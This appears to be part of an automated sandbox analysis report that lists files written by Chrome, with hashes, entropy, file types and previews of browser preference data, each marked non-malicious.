                                                              Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[],"expiration":"13248516607497410","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":27387},"server":"https://www.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248516607334226","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":34287},"server":"https://ssl.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248516607463627","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":31787},"server":"https://fonts.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248516607318875","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":23359},"server":"https://apis.google.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):4927
                                                              Entropy (8bit):4.942296130114018
                                                              Encrypted:false
                                                              SSDEEP:48:Yc1kKSChkSirbNqARiqTlYGlQKHoTw0jrf4MqM8C1Nfct/9BhUJo3KhmeSnpNGzC:nVLR61pIKI95k0JCKL8nbOTlVuHn
                                                              MD5:91B185C1006719F76197121E16706158
                                                              SHA1:39E2BA8B661F1A4EF2DDE64FD9EF34B1A47762C5
                                                              SHA-256:B8136336231CE45BA78EB4565923AB5D679C1173ECE217C5AF0740125A7FADBA
                                                              SHA-512:C1ECA233CDE346D6B45DE87CC229E4F5CEE69C9CF9B1FBBC50850E1CF85B4182AF15DFDE837452CB1B46F2DD82D9E0D215D1CFD2D96EC5957973EFACDAE3366E
                                                              Malicious:false
                                                              Preview:{"account_id_migration_state":2,"account_tracker_service_last_update":"13298721015354457","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245924509391818","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"bookmark_bar":{"show_on_all_tabs":false},"browser":{"default_browser_infobar_last_declined":"13245924607060180","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","2042016"],"daily_rece
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):4927
                                                              Entropy (8bit):4.942296130114018
                                                              Encrypted:false
                                                              SSDEEP:48:Yc1kKSChkSirbNqARiqTlYGlQKHoTw0jrf4MqM8C1Nfct/9BhUJo3KhmeSnpNGzC:nVLR61pIKI95k0JCKL8nbOTlVuHn
                                                              MD5:91B185C1006719F76197121E16706158
                                                              SHA1:39E2BA8B661F1A4EF2DDE64FD9EF34B1A47762C5
                                                              SHA-256:B8136336231CE45BA78EB4565923AB5D679C1173ECE217C5AF0740125A7FADBA
                                                              SHA-512:C1ECA233CDE346D6B45DE87CC229E4F5CEE69C9CF9B1FBBC50850E1CF85B4182AF15DFDE837452CB1B46F2DD82D9E0D215D1CFD2D96EC5957973EFACDAE3366E
                                                              Malicious:false
                                                              Preview:{"account_id_migration_state":2,"account_tracker_service_last_update":"13298721015354457","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245924509391818","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"bookmark_bar":{"show_on_all_tabs":false},"browser":{"default_browser_infobar_last_declined":"13245924607060180","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","2042016"],"daily_rece
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):16
                                                              Entropy (8bit):3.2743974703476995
                                                              Encrypted:false
                                                              SSDEEP:3:1sjgWIV//Rv:1qIFJ
                                                              MD5:6752A1D65B201C13B62EA44016EB221F
                                                              SHA1:58ECF154D01A62233ED7FB494ACE3C3D4FFCE08B
                                                              SHA-256:0861415CADA612EA5834D56E2CF1055D3E63979B69EB71D32AE9AE394D8306CD
                                                              SHA-512:9CFD838D3FB570B44FC3461623AB2296123404C6C8F576B0DE0AABD9A6020840D4C9125EB679ED384170DBCAAC2FA30DC7FA9EE5B77D6DF7C344A0AA030E0389
                                                              Malicious:false
                                                              Preview:MANIFEST-000004.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):16
                                                              Entropy (8bit):3.2743974703476995
                                                              Encrypted:false
                                                              SSDEEP:3:1sjgWIV//Rv:1qIFJ
                                                              MD5:6752A1D65B201C13B62EA44016EB221F
                                                              SHA1:58ECF154D01A62233ED7FB494ACE3C3D4FFCE08B
                                                              SHA-256:0861415CADA612EA5834D56E2CF1055D3E63979B69EB71D32AE9AE394D8306CD
                                                              SHA-512:9CFD838D3FB570B44FC3461623AB2296123404C6C8F576B0DE0AABD9A6020840D4C9125EB679ED384170DBCAAC2FA30DC7FA9EE5B77D6DF7C344A0AA030E0389
                                                              Malicious:false
                                                              Preview:MANIFEST-000004.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):4899
                                                              Entropy (8bit):4.935931533909383
                                                              Encrypted:false
                                                              SSDEEP:48:Yc1kKSChkliFqARiqTlYGlQKHoTw0jrf4MqM8C1Nfct/9BhUJo3KhmeSnpNGzFen:nVLK61pIKI95k0JCKL8bbOTlVuHn
                                                              MD5:049739E195E83C219E1C7C39F7E074A4
                                                              SHA1:A3C132A7398223DBD1D653C11F68877A3950A7BC
                                                              SHA-256:DF8621B9883E4723107312D2697F69B5408347D9C9A386ED8914395AF165C8C2
                                                              SHA-512:7AB1F16D98BFAC5E43975F13ED63FE86B30FD10583F7D8976F069989D3B6F2B7F025A49869831DDC799EC2ECC270AEF1C48FDD1BF7F431CEDCB11D6E5D60D76E
                                                              Malicious:false
                                                              Preview:{"account_id_migration_state":2,"account_tracker_service_last_update":"13298721015354457","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245924509391818","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"bookmark_bar":{"show_on_all_tabs":false},"browser":{"default_browser_infobar_last_declined":"13245924607060180","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","2042016"],"daily_recei
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):106
                                                              Entropy (8bit):3.138546519832722
                                                              Encrypted:false
                                                              SSDEEP:3:tbloIlrJ5ldQxl7aXVdJiG6R0RlAl:tbdlrnQxZaHIGi0R6l
                                                              MD5:DE9EF0C5BCC012A3A1131988DEE272D8
                                                              SHA1:FA9CCBDC969AC9E1474FCE773234B28D50951CD8
                                                              SHA-256:3615498FBEF408A96BF30E01C318DAC2D5451B054998119080E7FAAC5995F590
                                                              SHA-512:CEA946EBEADFE6BE65E33EDFF6C68953A84EC2E2410884E12F406CAC1E6C8A0793180433A7EF7CE097B24EA78A1FDBB4E3B3D9CDF1A827AB6FF5605DA3691724
                                                              Malicious:false
                                                              Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):13
                                                              Entropy (8bit):2.8150724101159437
                                                              Encrypted:false
                                                              SSDEEP:3:Yx7:4
                                                              MD5:C422F72BA41F662A919ED0B70E5C3289
                                                              SHA1:AAD27C14B27F56B6E7C744A8EC5B1A7D767D7632
                                                              SHA-256:02E71EB4C587FEB7EE00CE8600F97411C2774C2FC34CB95B92D5538E7F30DA59
                                                              SHA-512:86010ED2B2EEBDCC5A8A076B37703669C294C6D1BFAAEA963E26A9C94B81B4C53EC765D9425E5B616159C43923F800A891F9B903659575DF02F8845521F8DC46
                                                              Malicious:false
                                                              Preview:85.0.4183.121
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):199748
                                                              Entropy (8bit):6.0448124575828155
                                                              Encrypted:false
                                                              SSDEEP:6144:q03ytU8zTbOFF0D1XMQUaqfIlUOoSiuRs:VCW8D2FmvoL
                                                              MD5:E60DFC6596AD4631983715C4A3CEE81B
                                                              SHA1:C7B33855C3A64BE8D464586EAD7B146002C64043
                                                              SHA-256:F52BB3FF9E9536A4BD26066BBB3E84D299D4FBFAED2A062A2B62128663F323B3
                                                              SHA-512:D8AA2F3E04A2E573BCDD994A853EC358CE2ABC62D5A82513CA7926BAE64EF72228ECF95BA21FE6C73CAC43943C04DCA5D9B1C7411B9F3E812F996BE66628FE3E
                                                              Malicious:false
                                                              Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en-GB"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.654247416776041e+12,"network":1.654247418e+12,"ticks":114744137.0,"uncertainty":3928952.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABaHlwIoHYlQKZwuwW8V0yxAAAAAAIAAAAAABBmAAAAAQAAIAAAAOT4j8Zm9U1zXX6oEUpPqIYBIjSlOiLGeiMKiIFJZDroAAAAAA6AAAAAAgAAIAAAAFW1OavBhyV7qwszPZbindD+KU2Osh5O7HSmDPpFnuCDMAAAAGEkmqbufgFUSmOzx4cW7Aup7spqps4DvqbPrwRgUGqSpRZvQkbO+yVH56WF9zMTt0AAAAAyRwtYxjf7/AqYrFr0JZ6kbTiUt0/2PKkCw7ntLtbN2qrad7I3MeL4iNGDFgqRlhWgsb/6w0gJzQxAfL6rdzxi"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291206129529003"},"plugins":{"metadata":{"adobe-flash-player":{"d
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):102096
                                                              Entropy (8bit):3.750383296977358
                                                              Encrypted:false
                                                              SSDEEP:384:tDN2icDtD2c7ClN+r7vSEr3Baw5HUtGFMrX7aFberxmI3SI4srrT2mP7F30GGK1j:zy1pCkQhcerj5UklPzOmKgqy5f
                                                              MD5:303A9BBE8192F3D77E6BFF8334626437
                                                              SHA1:2D209B29B0606566E63B79E1769C3BD4D2A88C57
                                                              SHA-256:0597B1BE36EC03645AC4E28BBCEACFB97A07C6C8EEBAD3E941687AB5E32C6DF9
                                                              SHA-512:B793D1B664F5243FF375E4367D6098ADA0A0EA9C44518026C66D41D16AD7E9129970AA4DE342E1E19A6EF9C6FE0FEE53088995655D3087BBDA363770758AE321
                                                              Malicious:false
                                                              Preview:...............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....^8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):150056
                                                              Entropy (8bit):4.8588214550289095
                                                              Encrypted:false
                                                              SSDEEP:3072:P8C4uHgjBz+BZKEZZ3F0Sl03PzpDL7UI09QEwNyfe:P8C5go1U6IYeH
                                                              MD5:C56FF16BF9B9FC0002C0128DD0BD763D
                                                              SHA1:5048CFDBAC5D7AAAD345BAE08E66E8C4E803CA02
                                                              SHA-256:404AA48D274C3A8FEC3145858E00279D01E0C37A5304218E191C0156E4DE00FF
                                                              SHA-512:D993A324F5D9A1FC4FB3131252F48679750081D996295C994E2DCA4E84F2DECF7E90AF6766EFEDC2CEFC6B66194FFF38181C9E9CE45346BEEB8B3A09CE66BB73
                                                              Malicious:false
                                                              Preview:.........................[.................................. ...X...l...h...d...0.......X...T...P...L...H.......@...<.......4...0...,.......|...`...D........... ................................'......ozama........*...'......g.bat........&...'......onwod.......`....'......ennab............'......nozam............(......geips.......P...((......rekoj...........@(......lgoog...........X(......uotpo........+..p(......lreko.......d...h(...............Y...............Y...Y..pY..TY..8Y...Y...Y...Y...Y...Y...Y...X...Y...Y...Y...Y...Y...X..|Y..xY...X..pY..xX..hY..XX..`Y..\Y..4X..TY..PY..LY..HY..DY..@Y...X..8Y...W..0Y...W..(Y...W.. Y...Y...Y...Y...Y...Y...Y...Y...Y...X...X...X...X..PW..4W...X...X...X...X...W...X...X...X...X...V...X...V...V...X...X...X..xV...X...X...X...X...X...X...X...X...X..|X..4V..tX..pX..lX..hX..dX...V...U..XX...U..PX..LX...U..DX..@X..<X..8X..xU..\U..@U..(X..$X.. X...X...X...X...U...X...X...X...X...T...T...T...T...W...W...W...W...W...W...W...W...W..LT...W...W...W...W.. T...W..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):199645
                                                              Entropy (8bit):6.044540100232156
                                                              Encrypted:false
                                                              SSDEEP:6144:y03ytU8zTbOFF0D1XMQUaqfIlUOoSiuRs:9CW8D2FmvoL
                                                              MD5:DBBBDCB7A4EC0FD857BBAC7314921BAD
                                                              SHA1:BA35AA951DC9EEFED613BE5555E4D5E0451859B8
                                                              SHA-256:3E6DCBB0EB676F58C644DC7FD22AC795C6E6B4C313FDC00AF364612BC90F06A7
                                                              SHA-512:81B3CFCA7B3A4876C876ACCF689ED67036E6F47DDDD42FF435010A1C9417717398413A1692B91DD0305E8C75BEA84FE1D56635C6A64ECFCB2B77B0FC86316F34
                                                              Malicious:false
                                                              Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en-GB"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.654247416776041e+12,"network":1.654247418e+12,"ticks":114744137.0,"uncertainty":3928952.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABaHlwIoHYlQKZwuwW8V0yxAAAAAAIAAAAAABBmAAAAAQAAIAAAAOT4j8Zm9U1zXX6oEUpPqIYBIjSlOiLGeiMKiIFJZDroAAAAAA6AAAAAAgAAIAAAAFW1OavBhyV7qwszPZbindD+KU2Osh5O7HSmDPpFnuCDMAAAAGEkmqbufgFUSmOzx4cW7Aup7spqps4DvqbPrwRgUGqSpRZvQkbO+yVH56WF9zMTt0AAAAAyRwtYxjf7/AqYrFr0JZ6kbTiUt0/2PKkCw7ntLtbN2qrad7I3MeL4iNGDFgqRlhWgsb/6w0gJzQxAfL6rdzxi"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291206129529003"},"plugins":{"metadata":{"adobe-flash-player":{"d
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:PGP symmetric key encrypted data - Plaintext or unencrypted data salted -
                                                              Category:dropped
                                                              Size (bytes):100752
                                                              Entropy (8bit):3.7506088696232336
                                                              Encrypted:false
                                                              SSDEEP:384:kDN2icDtD2c7ClN+r7vSEr3Baw5HUtGFMrX7aFberxmASI4srrT2mP030GGK1Ow1:Qy1pCw1hcerj5UklPzOmKgqy5z
                                                              MD5:DE3B2F0E95DB4520CED7533E1DF3B3DC
                                                              SHA1:C5E7124A9CF7E9BBE71D30223544BED7ED025642
                                                              SHA-256:F370FC4B142674F05F59A39BE797843E51FD969EF5242A5748861D79755B5F73
                                                              SHA-512:0C4F3F311693932DFD3EB6E7558131582C680765360FA0C6F76FEDDFE9A55D79D28E4008681DC9F3D39D2B07EAAA2C571405EE830469188B7616E9F3CFB25C04
                                                              Malicious:false
                                                              Preview:................*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....^8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):99424
                                                              Entropy (8bit):3.7503910359576045
                                                              Encrypted:false
                                                              SSDEEP:384:fDN2icDtD2c7ClN+r7vSEr3Baw5HUtGFMrX7aFberxmASI4srrT2mP030GGK1Owm:5y1pCw1hcer4UklPzOmKgqy5z
                                                              MD5:C381B76739A18DFB606AEE7711A178FA
                                                              SHA1:75E5D5174532912188B08A9280EFF4496107B86C
                                                              SHA-256:F7319EB048339AF8D111A0640619F8F7997AD449FB0360FD4C60CD467AF3D71C
                                                              SHA-512:247C674DC6D0F962F6317BD61045C1A0CBAAC0B5E24223E0BB9F920B6B36653C187F46EC601B8B3EE6A2B4951B6306C37B582027AD7294258C156B1FE0C4278D
                                                              Malicious:false
                                                              Preview:\...............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....^8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):102096
                                                              Entropy (8bit):3.750383296977358
                                                              Encrypted:false
                                                              SSDEEP:384:tDN2icDtD2c7ClN+r7vSEr3Baw5HUtGFMrX7aFberxmI3SI4srrT2mP7F30GGK1j:zy1pCkQhcerj5UklPzOmKgqy5f
                                                              MD5:303A9BBE8192F3D77E6BFF8334626437
                                                              SHA1:2D209B29B0606566E63B79E1769C3BD4D2A88C57
                                                              SHA-256:0597B1BE36EC03645AC4E28BBCEACFB97A07C6C8EEBAD3E941687AB5E32C6DF9
                                                              SHA-512:B793D1B664F5243FF375E4367D6098ADA0A0EA9C44518026C66D41D16AD7E9129970AA4DE342E1E19A6EF9C6FE0FEE53088995655D3087BBDA363770758AE321
                                                              Malicious:false
                                                              Preview:...............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....^8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):199748
                                                              Entropy (8bit):6.0448124575828155
                                                              Encrypted:false
                                                              SSDEEP:6144:q03ytU8zTbOFF0D1XMQUaqfIlUOoSiuRs:VCW8D2FmvoL
                                                              MD5:E60DFC6596AD4631983715C4A3CEE81B
                                                              SHA1:C7B33855C3A64BE8D464586EAD7B146002C64043
                                                              SHA-256:F52BB3FF9E9536A4BD26066BBB3E84D299D4FBFAED2A062A2B62128663F323B3
                                                              SHA-512:D8AA2F3E04A2E573BCDD994A853EC358CE2ABC62D5A82513CA7926BAE64EF72228ECF95BA21FE6C73CAC43943C04DCA5D9B1C7411B9F3E812F996BE66628FE3E
                                                              Malicious:false
                                                              Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en-GB"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.654247416776041e+12,"network":1.654247418e+12,"ticks":114744137.0,"uncertainty":3928952.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABaHlwIoHYlQKZwuwW8V0yxAAAAAAIAAAAAABBmAAAAAQAAIAAAAOT4j8Zm9U1zXX6oEUpPqIYBIjSlOiLGeiMKiIFJZDroAAAAAA6AAAAAAgAAIAAAAFW1OavBhyV7qwszPZbindD+KU2Osh5O7HSmDPpFnuCDMAAAAGEkmqbufgFUSmOzx4cW7Aup7spqps4DvqbPrwRgUGqSpRZvQkbO+yVH56WF9zMTt0AAAAAyRwtYxjf7/AqYrFr0JZ6kbTiUt0/2PKkCw7ntLtbN2qrad7I3MeL4iNGDFgqRlhWgsb/6w0gJzQxAfL6rdzxi"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291206129529003"},"plugins":{"metadata":{"adobe-flash-player":{"d
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):199553
                                                              Entropy (8bit):6.044287905636466
                                                              Encrypted:false
                                                              SSDEEP:6144:n03ytU8zTbOFF0D1XMQUaqfIlUOoSiuRs:0CW8D2FmvoL
                                                              MD5:2BEFEAD84AFABFAFFEFD89DDE1868438
                                                              SHA1:38943C0029546993EE5D68E29AAA31EDBD191596
                                                              SHA-256:00921474ABA2E1E15398462507CE765024331A1FDE159992A25670F188BBC7F9
                                                              SHA-512:314A49169ECAFDCBEF4BD930B430BCB918A9DD91A24708A3ABE052264C4D0EDD11E23D5E7CC7B427719F3FA9A845E41063304BE5DCEF4B84B419D05BA14DA400
                                                              Malicious:false
